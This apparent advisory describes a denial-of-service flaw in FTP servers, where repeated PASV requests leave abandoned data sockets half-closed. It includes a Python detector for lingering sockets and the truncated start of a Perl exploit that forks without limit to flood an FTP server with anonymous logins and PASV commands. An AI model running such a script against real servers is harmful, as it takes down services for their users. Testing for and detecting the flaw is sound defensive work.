If a remote host establishes a data connection to the FTP server and the user then issues a subsequent PORT command, the server must close the existing data connection before listening on the new port and sending the positive reply to the subsequent PASV command. This leaves the old data connection in the CLOSE_WAIT state at best, or in FIN_WAIT_2 if the attacker simply abandons the data connection instead of closing it properly. This allows the attacker to mount a Denial-of-Service (DoS) attack by opening a large number of sockets.
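A server-side check for the condition described above, added here as an example and not part of the original advisory: it parses `ss -tan`-style socket listings and counts, per remote peer, data sockets left in CLOSE_WAIT or FIN_WAIT_2 on the server's passive port range. The passive range, the threshold and the sample listing are assumptions and constructed data, not values from the page.

```python
"""Count lingering FTP data sockets per remote peer from `ss -tan`-style output."""
from collections import Counter
from typing import Iterable, List

# The two half-closed states named in the advisory: the server side of an
# abandoned or improperly closed data connection ends up in one of these.
LINGERING_STATES = {"CLOSE-WAIT", "FIN-WAIT-2"}


def lingering_per_peer(lines: Iterable[str], passive_range=(49152, 65534)) -> Counter:
    """Return a Counter of peer IP -> number of lingering data sockets.

    `passive_range` is an assumed inclusive range of local ports the FTP server
    hands out in PASV replies; set it to the server's configured range.
    """
    lo, hi = passive_range
    counts: Counter = Counter()
    for line in lines:
        fields = line.split()
        # Skip the header line and any socket not in a lingering state.
        if len(fields) < 5 or fields[0] not in LINGERING_STATES:
            continue
        local, peer = fields[3], fields[4]
        local_port = int(local.rsplit(":", 1)[1])
        if lo <= local_port <= hi:  # only the passive data ports count
            counts[peer.rsplit(":", 1)[0]] += 1
    return counts


def offenders(lines: Iterable[str], threshold=50, passive_range=(49152, 65534)) -> List[str]:
    """Peers holding at least `threshold` lingering data sockets (assumed threshold)."""
    per_peer = lingering_per_peer(lines, passive_range)
    return sorted(peer for peer, n in per_peer.items() if n >= threshold)


# Constructed sample in `ss -tan` layout (not captured from a real host).
SAMPLE = """State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 0 192.0.2.10:21 198.51.100.7:40211
CLOSE-WAIT 0 0 192.0.2.10:50001 198.51.100.7:40212
CLOSE-WAIT 0 0 192.0.2.10:50002 198.51.100.7:40213
FIN-WAIT-2 0 0 192.0.2.10:50003 198.51.100.7:40214
CLOSE-WAIT 0 0 192.0.2.10:443 198.51.100.7:40215
FIN-WAIT-2 0 0 192.0.2.10:50004 203.0.113.5:51000
""".splitlines()

if __name__ == "__main__":
    print(lingering_per_peer(SAMPLE))
    print(offenders(SAMPLE, threshold=3))
```

On a live host, feed it `subprocess.run(["ss", "-tan"], capture_output=True, text=True).stdout.splitlines()` and alert when `offenders` is non-empty.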
The following exploit script can be used to test for this vulnerability:
#!/usr/bin/perl
$DOS_HOST = "localhost";
use IO::Socket;
$pid = $$;
$num = 0;
while (1) {
    while (fork) {
        $sock = IO::Socket::INET->new(
            Proto    => "tcp",
            PeerAddr => $DOS_HOST,
            PeerPort => "ftp(21)",
        );
        if (!$sock) {
            print "connect failed!\n";
            waitpid -1, 0;
        }
        while (<$sock>) {
            print;
            print $sock "USER anonymous\r\n" if (/^220 .*/);
            print $sock "PASS root@\r\n"     if (/^331 .*/);
            print $sock "PASV\r\n"           if (/^230 .*/);